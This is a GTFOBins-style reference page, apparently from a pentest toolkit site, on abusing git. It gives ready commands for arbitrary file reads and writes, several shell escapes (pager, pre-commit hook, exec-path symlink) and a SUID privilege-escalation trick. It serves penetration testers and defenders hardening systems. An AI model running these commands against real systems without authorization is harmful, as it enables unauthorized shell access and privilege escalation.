🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🐚 GTFOBins / git

git

File Read

The read file content is displayed in `diff` style output format.

git diff /dev/null /path/to/input-file

File Write

The patch can be created locally by creating the file that will be written on the target using its absolute path: ``` echo DATA >/path/to/input-file git diff /dev/null /path/to/input-file >x.patch ```

git apply --unsafe-paths --directory / x.patch

Inherit

git help config

The help system can also be reached from any `git` command, e.g., `git branch`.

git branch --help config
!/bin/sh

Shell

PAGER='/bin/sh -c "exec sh 0<&1"' git -p help

Git hooks are merely shell scripts and in the following example the hook associated to the `pre-commit` action is used. Any other hook will work, just make sure to be able perform the proper action to trigger it. An existing repository can also be used, and moving into the directory works too.

git init .
echo 'exec /bin/sh 0<&2 1>&2' >.git/hooks/pre-commit
chmod +x .git/hooks/pre-commit
git -C . commit --allow-empty -m x
ln -s /bin/sh git-x
git --exec-path=. x

SUID override:

ln -s /bin/sh git-x
git --exec-path=. x -p